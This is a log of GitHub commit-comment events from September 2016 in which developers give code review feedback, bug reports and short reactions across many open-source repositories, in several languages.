{"id":"4622995902","type":"CommitCommentEvent","actor":{"login":"mrackwitz"},"repo":{"name":"CocoaPods/blog.cocoapods.org"},"payload":{"comment":{"id":19187504,"position":25,"line":221,"path":"_posts/2014-12-25-Pod-Authors-Guide-to-CocoaPods-Frameworks.markdown","commit_id":"6933ae5ccfc1e0b39dd23f4ec67d7a083975836d","created_at":"2016-09-27T09:30:01Z","updated_at":"2016-09-27T09:30:01Z","body":"Do you mean which was the latest beta at this point? This doesn't matter anymore. This is more than a year ago. Meanwhile CocoaPods has reached 1.0 and you should really always use the latest stable version.\r\n\r\nPlease refrain from commenting on merged commits. Thanks."}},"created_at":"2016-09-27T09:30:01Z"}
{"id":"4622998042","type":"CommitCommentEvent","actor":{"login":"facelesspanda"},"repo":{"name":"MoOx/phenomic"},"payload":{"comment":{"id":19187509,"position":null,"line":null,"path":null,"commit_id":"0b56c2b6a6a55bbfa4f779c7b4ec7058e258de3a","created_at":"2016-09-27T09:30:24Z","updated_at":"2016-09-27T09:30:24Z","body":":+1:\n\nI'm hyped for 1.0.0 :shipit:"}},"created_at":"2016-09-27T09:30:24Z"}
{"id":"4622998889","type":"CommitCommentEvent","actor":{"login":"titanicboyke"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":19187510,"position":null,"line":null,"path":null,"commit_id":"f3b4efb51a27820a858e450f432246c9f5051a96","created_at":"2016-09-27T09:30:32Z","updated_at":"2016-09-27T09:30:32Z","body":"![shield](https://cloud.githubusercontent.com/assets/22316434/18867757/c5fa04d8-84a5-11e6-9232-17fb9af28877.jpg)\r\n"}},"created_at":"2016-09-27T09:30:32Z"}
{"id":"4622999653","type":"CommitCommentEvent","actor":{"login":"tomhughes"},"repo":{"name":"openstreetmap/openstreetmap-website"},"payload":{"comment":{"id":19187511,"position":null,"line":null,"path":null,"commit_id":"fdcd867de6574688935458f3c099beb5987a1c6e","created_at":"2016-09-27T09:30:41Z","updated_at":"2016-09-27T09:30:41Z","body":"I can hardly be the contact when I'm the person most likely to be complained about!"}},"created_at":"2016-09-27T09:30:41Z"}
{"id":"4623002808","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":19187515,"position":null,"line":null,"path":null,"commit_id":"9bf63ebf0958426dd70fcd27b397c0340a57d53a","created_at":"2016-09-27T09:31:17Z","updated_at":"2016-09-27T09:31:17Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#MG0nXZSeQ2Cf8HhGvNt0dA"}},"created_at":"2016-09-27T09:31:17Z"}
{"id":"4623005127","type":"CommitCommentEvent","actor":{"login":"tomasfejfar"},"repo":{"name":"TomasVotruba/tomasvotruba.cz"},"payload":{"comment":{"id":19187520,"position":null,"line":null,"path":null,"commit_id":"4a564927327a6893620e7af6bc9a552cae94d707","created_at":"2016-09-27T09:31:42Z","updated_at":"2016-09-27T09:31:42Z","body":"JFYI https://www.souki.cz/jak-efektivne-nacitat-webfonty"}},"created_at":"2016-09-27T09:31:42Z"}
{"id":"4623006498","type":"CommitCommentEvent","actor":{"login":"Lwmte"},"repo":{"name":"opentomb/OpenTomb"},"payload":{"comment":{"id":19187526,"position":null,"line":null,"path":null,"commit_id":"8d44a30b433706b1f753057e7cd2db75269a3fae","created_at":"2016-09-27T09:31:59Z","updated_at":"2016-09-27T09:31:59Z","body":"Oh, sorry for that, I was away for too long to notice change of commit policy!\r\n\r\nCheck it now, there was an old hack code which effectively did the same thing, but now it is also removed according to documentation."}},"created_at":"2016-09-27T09:31:59Z"}
{"id":"4623013658","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19187533,"position":null,"line":null,"path":null,"commit_id":"65dd468927ff4a096722abf538d7163a5128ee3b","created_at":"2016-09-27T09:33:21Z","updated_at":"2016-09-27T09:33:21Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#HWFkGu9DR7eZyeMAyKXCbA"}},"created_at":"2016-09-27T09:33:21Z"}
{"id":"4623015983","type":"CommitCommentEvent","actor":{"login":"amboyna"},"repo":{"name":"animusdev/Old-World-Blue"},"payload":{"comment":{"id":19187537,"position":null,"line":null,"path":null,"commit_id":"9d4d240a2efad70e6768300cfb2b228494ab1d7d","created_at":"2016-09-27T09:33:46Z","updated_at":"2016-09-27T09:33:46Z","body":"А какой используется?"}},"created_at":"2016-09-27T09:33:46Z"}
{"id":"4623017655","type":"CommitCommentEvent","actor":{"login":"Lazzi"},"repo":{"name":"matk0/ticketee"},"payload":{"comment":{"id":19187539,"position":2,"line":2,"path":"app/controllers/projects_controller.rb","commit_id":"1ce4024e5d7c80e575a95bf60034c70928e104c8","created_at":"2016-09-27T09:34:07Z","updated_at":"2016-09-27T09:34:07Z","body":"I don't like before_action to set instance variables, i prefer to set explicitly all instance variables in action. (Same goes for TicketsController).\r\n\r\nAnd for exception handling instead of before_action, I would prefer: \r\n```\r\nrescue_from ActiveRecord::RecordNotFound, with: :not_found\r\n...\r\ndef not_found\r\n  flash[:alert] = \"The project you were looking for could not be found.\"\r\n  redirect_to projects_path\r\nend\r\n```"}},"created_at":"2016-09-27T09:34:07Z"}
{"id":"4623021647","type":"CommitCommentEvent","actor":{"login":"smoki3"},"repo":{"name":"MarlinFirmware/Marlin"},"payload":{"comment":{"id":19187549,"position":null,"line":null,"path":null,"commit_id":"ea0dbee3c93fa221b8c7d3b6c566d635eae2afd2","created_at":"2016-09-27T09:34:48Z","updated_at":"2016-09-27T09:34:48Z","body":"Breaks every thing. the printer is moving Y axis for probing :(\r\n"}},"created_at":"2016-09-27T09:34:48Z"}
{"id":"4623023400","type":"CommitCommentEvent","actor":{"login":"volumio"},"repo":{"name":"volumio/Build"},"payload":{"comment":{"id":19187554,"position":null,"line":null,"path":null,"commit_id":"5409190efbfacefe0c21b95a48b268921cc45516","created_at":"2016-09-27T09:35:09Z","updated_at":"2016-09-27T09:35:09Z","body":"We have a problem with this, when updating the first start script does not get exectuted. \r\nSee here:\r\nhttps://volumio.org/forum/volumio-final-release-very-near-pre-test-needed-t4709-10.html#p21608\r\n\r\nSo a better solution would be avoiding to delete SSH keys here in the script, but deleting them in the first start script and then doing dpkg-reconfigure openssh-server. What do you think?"}},"created_at":"2016-09-27T09:35:09Z"}
{"id":"4623028525","type":"CommitCommentEvent","actor":{"login":"connormclaud"},"repo":{"name":"Jenik-art/PycharmProjects"},"payload":{"comment":{"id":19187561,"position":4,"line":4,"path":"Test2.py","commit_id":"1b73a475f2d229bfe4e8d5690af66f6d08b42dc0","created_at":"2016-09-27T09:36:04Z","updated_at":"2016-09-27T09:36:04Z","body":"Please remove this line and move text inside input function"}},"created_at":"2016-09-27T09:36:04Z"}
{"id":"4623030557","type":"CommitCommentEvent","actor":{"login":"prigaux"},"repo":{"name":"UnivParis1/annuaire"},"payload":{"comment":{"id":19187567,"position":null,"line":null,"path":null,"commit_id":"eb736cdfe3b3c7c907bd4bb58bbeaaf899bcc2fc","created_at":"2016-09-27T09:36:25Z","updated_at":"2016-09-27T09:36:25Z","body":"    main.searchCrit.token.name?main.searchCrit.token.name:main.searchCrit.token\r\n\r\npeut s'écrire\r\n\r\n    main.searchCrit.token.name || main.searchCrit.token\r\n"}},"created_at":"2016-09-27T09:36:25Z"}
{"id":"4623033268","type":"CommitCommentEvent","actor":{"login":"leleuj"},"repo":{"name":"pac4j/spring-security-pac4j"},"payload":{"comment":{"id":19187571,"position":null,"line":null,"path":null,"commit_id":"2d0d5923c0a9a60e000261e12c96947374399dc5","created_at":"2016-09-27T09:36:55Z","updated_at":"2016-09-27T09:36:55Z","body":"Unless there is a mistake, we still have the `maven-bundle-plugin`..."}},"created_at":"2016-09-27T09:36:55Z"}
{"id":"4623034051","type":"CommitCommentEvent","actor":{"login":"jf---"},"repo":{"name":"tpaviot/pythonocc-core"},"payload":{"comment":{"id":19187572,"position":null,"line":null,"path":null,"commit_id":"5842af649af7f34d95698582a8da0c2206f8d5e6","created_at":"2016-09-27T09:37:05Z","updated_at":"2016-09-27T09:37:05Z","body":"super thrilled to see the shader classes wrapped!"}},"created_at":"2016-09-27T09:37:05Z"}
{"id":"4623035090","type":"CommitCommentEvent","actor":{"login":"MoOx"},"repo":{"name":"MoOx/phenomic"},"payload":{"comment":{"id":19187578,"position":6,"line":25,"path":"src/builder/webpack/config.node.js","commit_id":"3a0fdbfd104858a12ed86ef6db54df565e34a44d","created_at":"2016-09-27T09:37:16Z","updated_at":"2016-09-27T09:37:16Z","body":"Man you are missing the fact that require.resolve is executed when file is consumed. And the other require is a string, so consumed later, not in the same context. We don't have the choice here. 0.17.0 fresh setup just does not work."}},"created_at":"2016-09-27T09:37:16Z"}
{"id":"4623035284","type":"CommitCommentEvent","actor":{"login":"TomasVotruba"},"repo":{"name":"TomasVotruba/tomasvotruba.cz"},"payload":{"comment":{"id":19187579,"position":null,"line":null,"path":null,"commit_id":"4a564927327a6893620e7af6bc9a552cae94d707","created_at":"2016-09-27T09:37:18Z","updated_at":"2016-09-27T09:37:18Z","body":"tl;dr; \r\n\r\nhttps://github.com/TomasVotruba/tomasvotruba.cz/blob/13914d0fe6a36a339bcd1fed5c02bd37c5e74d57/source/css/style.css#L11-L19\r\n\r\nTedy aplikovat font jen na větších displejích."}},"created_at":"2016-09-27T09:37:18Z"}
{"id":"4623035458","type":"CommitCommentEvent","actor":{"login":"bllackeye"},"repo":{"name":"bllackeye/salt"},"payload":{"comment":{"id":19187580,"position":null,"line":null,"path":null,"commit_id":"edb1baad0869425e1b7cbda295069a60fb9ca9a2","created_at":"2016-09-27T09:37:20Z","updated_at":"2016-09-27T09:37:20Z","body":"You type salt '*' saltutils.sync_modules and hope that your modules will be synchronised to every minion, so you think you can do salt '*' yrmodule.yrfunction params. BUT, salt may not work as you expected. \r\n\r\nsalt '*' saltutils.sync_modules triggers a sequence of events. \r\n1) salt-master broadcast sync message to every minions through an unreliable channel. \r\n2) the sync message might get lost and fail to reach some minions. \r\n3) salt-minion start download your custom module if it receives the sync message. \r\n\r\nWe know that step 3) is very reliable and 1),2) simply inform salt-minion to download some modules. \r\nActually, a salt-minion can decide if sync_modules is required by checking the readiness of the module which is about to execute on the minion.   \r\n\r\n\r\n\r\n"}},"created_at":"2016-09-27T09:37:20Z"}
{"id":"4623036586","type":"CommitCommentEvent","actor":{"login":"connormclaud"},"repo":{"name":"Jenik-art/PycharmProjects"},"payload":{"comment":{"id":19187582,"position":7,"line":7,"path":"Test2.py","commit_id":"1b73a475f2d229bfe4e8d5690af66f6d08b42dc0","created_at":"2016-09-27T09:37:33Z","updated_at":"2016-09-27T09:37:33Z","body":"English is preferred language for variable naming. annualInterestRate is better name than procentInYear"}},"created_at":"2016-09-27T09:37:33Z"}
{"id":"4623036704","type":"CommitCommentEvent","actor":{"login":"MoOx"},"repo":{"name":"MoOx/phenomic"},"payload":{"comment":{"id":19187583,"position":6,"line":25,"path":"src/builder/webpack/config.node.js","commit_id":"3a0fdbfd104858a12ed86ef6db54df565e34a44d","created_at":"2016-09-27T09:37:34Z","updated_at":"2016-09-27T09:37:34Z","body":"The path is in the generated webpack node build, so who cares?"}},"created_at":"2016-09-27T09:37:34Z"}
{"id":"4623037091","type":"CommitCommentEvent","actor":{"login":"TimDaub"},"repo":{"name":"bigchaindb/bigchaindb"},"payload":{"comment":{"id":19187585,"position":null,"line":null,"path":null,"commit_id":"09b89cf247e11943cb49be18f6303d1f1ada4924","created_at":"2016-09-27T09:37:39Z","updated_at":"2016-09-27T09:37:39Z","body":"thx!"}},"created_at":"2016-09-27T09:37:39Z"}
{"id":"4623037637","type":"CommitCommentEvent","actor":{"login":"connormclaud"},"repo":{"name":"Jenik-art/PycharmProjects"},"payload":{"comment":{"id":19187586,"position":8,"line":8,"path":"Test2.py","commit_id":"1b73a475f2d229bfe4e8d5690af66f6d08b42dc0","created_at":"2016-09-27T09:37:45Z","updated_at":"2016-09-27T09:37:45Z","body":"Move to input function"}},"created_at":"2016-09-27T09:37:45Z"}
{"id":"4623039862","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19187591,"position":null,"line":null,"path":null,"commit_id":"6d180996ed1ece59a59f3a0eaa5ec02bcc216d4a","created_at":"2016-09-27T09:38:10Z","updated_at":"2016-09-27T09:38:10Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#FmJPEWoxS82hs6zbd2na9w"}},"created_at":"2016-09-27T09:38:10Z"}
{"id":"4623042572","type":"CommitCommentEvent","actor":{"login":"vtsukur"},"repo":{"name":"kallura/balance-calculation"},"payload":{"comment":{"id":19187594,"position":null,"line":null,"path":null,"commit_id":"b163496f954e9cd1d282caaf97b59ab24b2be84e","created_at":"2016-09-27T09:38:40Z","updated_at":"2016-09-27T09:38:40Z","body":"Thank you, this looks better."}},"created_at":"2016-09-27T09:38:40Z"}
{"id":"4623044698","type":"CommitCommentEvent","actor":{"login":"thangngoc89"},"repo":{"name":"MoOx/phenomic"},"payload":{"comment":{"id":19187600,"position":6,"line":25,"path":"src/builder/webpack/config.node.js","commit_id":"3a0fdbfd104858a12ed86ef6db54df565e34a44d","created_at":"2016-09-27T09:39:06Z","updated_at":"2016-09-27T09:39:06Z","body":"alright 👍 "}},"created_at":"2016-09-27T09:39:06Z"}
{"id":"4623046268","type":"CommitCommentEvent","actor":{"login":"a0119754"},"repo":{"name":"a0119754/CS3210Assignment"},"payload":{"comment":{"id":19187602,"position":null,"line":null,"path":null,"commit_id":"ebc39cd77338ed9156df72b49e5951f595b436e9","created_at":"2016-09-27T09:39:23Z","updated_at":"2016-09-27T09:39:23Z","body":"Results of sequential:\r\n0.68, 0.65, 0.65 (average: 0.66)\r\n\r\nResults of original:\r\nCPU: 5.93, 5.57, 5.62 (average: 5.706666667)\r\nGPU: 12.83, 12.82, 12.82 (average: 12.82333333)\r\n\r\nResults before:\r\nCPU: 3.46, 5.71, 3.49 (4.22)\r\nGPU: 4.17, 4.2, 4.19 (4.18666666666667)\r\n\r\nResults after:\r\nCPU: 6.65, 5.62, 3.47, 5.62, 5.62, 3.45, 3.5 (4.84714285714286)\r\nGPU: 4.05, 4.07, 4.05, 4.07, 4.07, 4.05, 4.05 (4.05857142857143)\r\n\r\nI don't get the CPU timings, not at all, especially since I have not been touching that segment of the code at all LOL\r\n\r\nGPU timings seem to have a certain degree of consistency now. Sure, the transpose of the matrix costs us memory and time that leads to just a little bit of improvement, but improvement nevertheless, so let's roll with it"}},"created_at":"2016-09-27T09:39:23Z"}
{"id":"4623047977","type":"CommitCommentEvent","actor":{"login":"fnxweb"},"repo":{"name":"deanturpin/fibonacci"},"payload":{"comment":{"id":19187605,"position":null,"line":null,"path":null,"commit_id":"6c1de06de938a6f92ccddf6c81423b051912750f","created_at":"2016-09-27T09:39:43Z","updated_at":"2016-09-27T09:39:43Z","body":"> 45ul\r\n\r\nOh dear.  5/10, must try harder."}},"created_at":"2016-09-27T09:39:43Z"}
{"id":"4623048671","type":"CommitCommentEvent","actor":{"login":"mediaprophet"},"repo":{"name":"AGLDWG/TR"},"payload":{"comment":{"id":19187610,"position":null,"line":null,"path":null,"commit_id":"60f65100796dbaa52aa48abc844465a68d5ecccb","created_at":"2016-09-27T09:39:50Z","updated_at":"2016-09-27T09:39:50Z","body":":)\r\n"}},"created_at":"2016-09-27T09:39:50Z"}
{"id":"4623048752","type":"CommitCommentEvent","actor":{"login":"gravitystorm"},"repo":{"name":"openstreetmap/openstreetmap-website"},"payload":{"comment":{"id":19187611,"position":null,"line":null,"path":null,"commit_id":"fdcd867de6574688935458f3c099beb5987a1c6e","created_at":"2016-09-27T09:39:51Z","updated_at":"2016-09-27T09:39:51Z","body":"> the OSM Foundation is responsible in an official capacity for the openstreetmap GitHub organization\r\n\r\nIt isn't. Remember, the OSMF exists to support, but not control, the OSM project, and the github/openstreetmap organisation is part of the openstreetmap project, not the OSMF. Otherwise it would be github.com/osmf, right?\r\n"}},"created_at":"2016-09-27T09:39:51Z"}
{"id":"4623048822","type":"CommitCommentEvent","actor":{"login":"connormclaud"},"repo":{"name":"Jenik-art/PycharmProjects"},"payload":{"comment":{"id":19187612,"position":11,"line":11,"path":"Test2.py","commit_id":"1b73a475f2d229bfe4e8d5690af66f6d08b42dc0","created_at":"2016-09-27T09:39:52Z","updated_at":"2016-09-27T09:39:52Z","body":"monthlyInterestRate is better name"}},"created_at":"2016-09-27T09:39:52Z"}
{"id":"4623049489","type":"CommitCommentEvent","actor":{"login":"atwice"},"repo":{"name":"Izeren/math-redactor"},"payload":{"comment":{"id":19187615,"position":40,"line":39,"path":"math-redactor/ExpressionTree/Expression.cpp","commit_id":"cc753fb2a336fdd1165ad33bdd2d6eae072ec47f","created_at":"2016-09-27T09:39:59Z","updated_at":"2016-09-27T09:39:59Z","body":"this-> это из питона?"}},"created_at":"2016-09-27T09:39:59Z"}
{"id":"4623053161","type":"CommitCommentEvent","actor":{"login":"connormclaud"},"repo":{"name":"Jenik-art/PycharmProjects"},"payload":{"comment":{"id":19187625,"position":12,"line":12,"path":"Test2.py","commit_id":"1b73a475f2d229bfe4e8d5690af66f6d08b42dc0","created_at":"2016-09-27T09:40:40Z","updated_at":"2016-09-27T09:40:40Z","body":"please remove lines 12 and 18. For loop don't require them"}},"created_at":"2016-09-27T09:40:40Z"}
{"id":"4623057376","type":"CommitCommentEvent","actor":{"login":"javadev"},"repo":{"name":"kenveski/Educational"},"payload":{"comment":{"id":19187628,"position":null,"line":null,"path":null,"commit_id":"490baa04a6aef56c753b874ff7ce2337f14e0006","created_at":"2016-09-27T09:41:26Z","updated_at":"2016-09-27T09:41:26Z","body":"Good start.\r\nYou may check for the game solution here: https://github.com/javadev/undescriptive-project"}},"created_at":"2016-09-27T09:41:26Z"}
{"id":"4623058149","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19187629,"position":null,"line":null,"path":null,"commit_id":"1d8b491b0056bbc86553b438bb64aa79f8b406d3","created_at":"2016-09-27T09:41:36Z","updated_at":"2016-09-27T09:41:36Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#QsxcxuMNRNaj9GrSgEixSg"}},"created_at":"2016-09-27T09:41:36Z"}
{"id":"4623060355","type":"CommitCommentEvent","actor":{"login":"connormclaud"},"repo":{"name":"Jenik-art/PycharmProjects"},"payload":{"comment":{"id":19187631,"position":null,"line":null,"path":null,"commit_id":"1b73a475f2d229bfe4e8d5690af66f6d08b42dc0","created_at":"2016-09-27T09:42:00Z","updated_at":"2016-09-27T09:42:00Z","body":"You would need another inner for loop which loops for 12 months/"}},"created_at":"2016-09-27T09:42:00Z"}
{"id":"4623061699","type":"CommitCommentEvent","actor":{"login":"neheren"},"repo":{"name":"neheren/P3-3DMapGen"},"payload":{"comment":{"id":19187633,"position":null,"line":null,"path":null,"commit_id":"9d326d25145fc2a7e5b5509038d442e3b22f9497","created_at":"2016-09-27T09:42:14Z","updated_at":"2016-09-27T09:42:14Z","body":"Flot jakob, \r\ndu er så\r\ndygtig\r\nhilsen\r\ndin søn, \r\nung toast"}},"created_at":"2016-09-27T09:42:14Z"}
{"id":"4623063376","type":"CommitCommentEvent","actor":{"login":"sbellem"},"repo":{"name":"bigchaindb/bigchaindb"},"payload":{"comment":{"id":19187637,"position":null,"line":null,"path":null,"commit_id":"09b89cf247e11943cb49be18f6303d1f1ada4924","created_at":"2016-09-27T09:42:33Z","updated_at":"2016-09-27T09:42:33Z","body":":+1: :smile: "}},"created_at":"2016-09-27T09:42:33Z"}
{"id":"4623065179","type":"CommitCommentEvent","actor":{"login":"elementrem"},"repo":{"name":"elementrem/go-elementrem"},"payload":{"comment":{"id":19187642,"position":null,"line":null,"path":null,"commit_id":"e69667d85ad57bf2c5fe79105761e011ed9e1e37","created_at":"2016-09-27T09:42:52Z","updated_at":"2016-09-27T09:42:52Z","body":"1.4.13 Massively code review && update in progress. I'm doing the test assessments."}},"created_at":"2016-09-27T09:42:52Z"}
{"id":"4623067991","type":"CommitCommentEvent","actor":{"login":"sbellem"},"repo":{"name":"bigchaindb/bigchaindb"},"payload":{"comment":{"id":19187645,"position":null,"line":null,"path":null,"commit_id":"09b89cf247e11943cb49be18f6303d1f1ada4924","created_at":"2016-09-27T09:43:23Z","updated_at":"2016-09-27T09:43:23Z","body":"This renders more nicely. You can some examples at http://sphinxcontrib-napoleon.readthedocs.io/en/latest/example_google.html"}},"created_at":"2016-09-27T09:43:23Z"}
{"id":"4623069960","type":"CommitCommentEvent","actor":{"login":"greut"},"repo":{"name":"Minimata/WebGl"},"payload":{"comment":{"id":19187650,"position":36,"line":118,"path":"squelette/jsExos/ALEX_CH04.js","commit_id":"99f70520a9610459e3e74590a12fd523a0a07952","created_at":"2016-09-27T09:43:44Z","updated_at":"2016-09-27T09:43:44Z","body":"[`performance.now()`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/now) is the timestamp since the page was loaded in milliseconds (with sub-milliseconds precision).\r\n\r\n`15` (or better `16`) is roughly how many milliseconds last a frame at 60fps.\r\n\r\n`|1` (or better `|0`) does a simple floatting point to integer casting as _bitwise_ operations operate on 32bits integers in JavaScript."}},"created_at":"2016-09-27T09:43:44Z"}
{"id":"4623071656","type":"CommitCommentEvent","actor":{"login":"vvs-"},"repo":{"name":"opentomb/OpenTomb"},"payload":{"comment":{"id":19187654,"position":null,"line":null,"path":null,"commit_id":"8d44a30b433706b1f753057e7cd2db75269a3fae","created_at":"2016-09-27T09:44:03Z","updated_at":"2016-09-27T09:44:03Z","body":"Yeah, it's fixed now. Thanks!"}},"created_at":"2016-09-27T09:44:03Z"}
{"id":"4623071756","type":"CommitCommentEvent","actor":{"login":"jomo"},"repo":{"name":"RedstonerServer/redstoner-utils"},"payload":{"comment":{"id":19187655,"position":null,"line":null,"path":null,"commit_id":"347f6969bf411b160b2fc734a2c52bd4dea6a5be","created_at":"2016-09-27T09:44:04Z","updated_at":"2016-09-27T09:44:04Z","body":"@psrcek You should add a code comment to point out this is intended and not a copy/paste accident"}},"created_at":"2016-09-27T09:44:04Z"}
{"id":"4623073842","type":"CommitCommentEvent","actor":{"login":"atwice"},"repo":{"name":"Izeren/math-redactor"},"payload":{"comment":{"id":19187658,"position":129,"line":127,"path":"math-redactor/ExpressionTree/Expression.cpp","commit_id":"cc753fb2a336fdd1165ad33bdd2d6eae072ec47f","created_at":"2016-09-27T09:44:26Z","updated_at":"2016-09-27T09:44:26Z","body":"кроме того, что нужно использовать RAII , еще полезно знать, что по стандарту безопасно делать `delete 0`."}},"created_at":"2016-09-27T09:44:26Z"}
{"id":"4623074471","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19187659,"position":null,"line":null,"path":null,"commit_id":"440b0fc9f80f6b149fe1799050d0b0048af79d0c","created_at":"2016-09-27T09:44:34Z","updated_at":"2016-09-27T09:44:34Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#SBt-iywCR4-GsOFrLdlw9A"}},"created_at":"2016-09-27T09:44:34Z"}
{"id":"4623074593","type":"CommitCommentEvent","actor":{"login":"simonpoole"},"repo":{"name":"openstreetmap/openstreetmap-website"},"payload":{"comment":{"id":19187660,"position":null,"line":null,"path":null,"commit_id":"fdcd867de6574688935458f3c099beb5987a1c6e","created_at":"2016-09-27T09:44:35Z","updated_at":"2016-09-27T09:44:35Z","body":"@mikelmaron wrt \"the OSM Foundation is responsible in an official capacity for the openstreetmap GitHub organization\". I'm fairly sure you would have a very very difficult time asserting that in court. It is completely clear that the OSMF does not have legal title outside the use of its TM in the name to any of the projects except to the very small bits and pieces it actually financed. "}},"created_at":"2016-09-27T09:44:35Z"}
{"id":"4623089813","type":"CommitCommentEvent","actor":{"login":"Apekshasilvan"},"repo":{"name":"amadeusmuc/node-ifttt"},"payload":{"comment":{"id":19187683,"position":null,"line":null,"path":null,"commit_id":"7f85106f684974981922beb9324350a4a296236f","created_at":"2016-09-27T09:47:16Z","updated_at":"2016-09-27T09:47:16Z","body":"I am getting error while creating action fields...please post example script to create action fields or please mail me"}},"created_at":"2016-09-27T09:47:16Z"}
{"id":"4623090056","type":"CommitCommentEvent","actor":{"login":"basarat"},"repo":{"name":"preboot/angular2-webpack"},"payload":{"comment":{"id":19187684,"position":null,"line":null,"path":null,"commit_id":"c668fc32e25b792d09e280833086948d22cac864","created_at":"2016-09-27T09:47:18Z","updated_at":"2016-09-27T09:47:18Z","body":"> maybe @basarat can help\r\n\r\nYup a bug. But I'm not the right person anymore : https://github.com/TypeStrong/atom-typescript/issues/980. People have stepped in so head on over to https://github.com/TypeStrong/atom-typescript/issues and some hero should come along :rose:"}},"created_at":"2016-09-27T09:47:18Z"}
{"id":"4623090782","type":"CommitCommentEvent","actor":{"login":"greut"},"repo":{"name":"HE-Arc/Majority"},"payload":{"comment":{"id":19187685,"position":null,"line":null,"path":null,"commit_id":"25febbf03f6d2415ad888ebd61311bb6d8d0a87f","created_at":"2016-09-27T09:47:26Z","updated_at":"2016-09-27T09:47:26Z","body":"Les fichiers binaires de ce type dans un dépôt, c'est pas terrible... utilisez le [wiki](/HE-Arc/Majority/wiki)"}},"created_at":"2016-09-27T09:47:26Z"}
{"id":"4623093689","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19187693,"position":null,"line":null,"path":null,"commit_id":"8b4f8380f2700c38d220b19bec6fe0bf9472bcba","created_at":"2016-09-27T09:47:59Z","updated_at":"2016-09-27T09:47:59Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#XjzdmQbmQamfV4f5D47SNA"}},"created_at":"2016-09-27T09:47:59Z"}
{"id":"4623094382","type":"CommitCommentEvent","actor":{"login":"k21"},"repo":{"name":"facebook/buck"},"payload":{"comment":{"id":19187695,"position":null,"line":null,"path":null,"commit_id":"ca49d538d93491020b28b44b6969b25b25e9ccdb","created_at":"2016-09-27T09:48:07Z","updated_at":"2016-09-27T09:48:07Z","body":"You are right, some values are still propagated to dependents even if the library has no sources. This was meant to address the case when a library can be used as a source path which requires that its `getPathToOutput()` does not return `null`, which for Java and Android libraries is controlled by this condition: https://github.com/facebook/buck/blob/bbb97dd0c7d843624c130400d2dd02ee89ae4409/src/com/facebook/buck/jvm/java/DefaultJavaLibrary.java#L284. So the code in this commit is not completely accurate, but it is good enough for the artificial project generator for now since the generator does not generate resources and manifest files yet anyway."}},"created_at":"2016-09-27T09:48:07Z"}
{"id":"4623095313","type":"CommitCommentEvent","actor":{"login":"OlivierJaquemet"},"repo":{"name":"johndyer/mediaelement"},"payload":{"comment":{"id":19187697,"position":null,"line":null,"path":null,"commit_id":"d55d7b908c01b191527b5e987c6ff581aee4bb2b","created_at":"2016-09-27T09:48:16Z","updated_at":"2016-09-27T09:48:16Z","body":"@SoftCreatR  Hi Sascha, thank you for providing this updated translation.\r\n\r\nCould you tell me if the previous translations were completely wrong, or if you \"only\" slightly improved the translations ? Because as you probably guessed, the translation Jalios provides for mejs were performed by an external provider and unfortunately, not being a native speaker of all those languages I cannot check their correctness... \r\nHowever, if they were completely off, I can tell our provider to fix them !\r\n\r\nThanks for your help."}},"created_at":"2016-09-27T09:48:16Z"}
{"id":"4623100869","type":"CommitCommentEvent","actor":{"login":"vobruba-martin"},"repo":{"name":"google/closure-compiler"},"payload":{"comment":{"id":19187702,"position":null,"line":null,"path":null,"commit_id":"82f23897059d244d793518a1355fe2e1cc0ba80f","created_at":"2016-09-27T09:49:17Z","updated_at":"2016-09-27T09:49:17Z","body":"@dimvar Look at this code:\r\n```javascript\r\n/**\r\n * @param {!MessagePort} port\r\n */\r\nfunction connectionCreate(port) {};\r\n\r\n/**\r\n * @param {!MessagePort} port\r\n */\r\nfunction connectionPortRenew(port) {\r\n\tport.onmessage = null;\r\n};\r\n```\r\nBefore this commit I got 100% typed and now I'm getting 80% typed. BTW if you remove one of these functions (no matter which one) you'll get 100% typed which is weird.\r\n\r\nI wasn't able to reproduce the compiled code increase but it seems to me that some type info from externs gets lost which leads to `--use_types_for_optimization` having no effect."}},"created_at":"2016-09-27T09:49:17Z"}
{"id":"4623104678","type":"CommitCommentEvent","actor":{"login":"prigaux"},"repo":{"name":"UnivParis1/annuaire"},"payload":{"comment":{"id":19187707,"position":6,"line":5,"path":"app/resultSearch.html","commit_id":"02f874bb8298c57c88e23121d76ace6e0822ec64","created_at":"2016-09-27T09:50:00Z","updated_at":"2016-09-27T09:50:00Z","body":"fragile... ne pas utiliser $location à part si vraiment nécessaire.\r\nfaire plutôt:\r\n- soit ajouter 'affiliation' dans PersonController, et donc faire p.affiliation\r\n- soit ajouter $routeParams dans PersonController, et donc faire p.$routeParams.affiliation\r\n"}},"created_at":"2016-09-27T09:50:00Z"}
{"id":"4623114666","type":"CommitCommentEvent","actor":{"login":"xfurry"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":19187725,"position":null,"line":null,"path":null,"commit_id":"9eb635a377bbbb8f01dbc500738150ffab7e31a5","created_at":"2016-09-27T09:51:52Z","updated_at":"2016-09-27T09:51:52Z","body":":+1: "}},"created_at":"2016-09-27T09:51:52Z"}
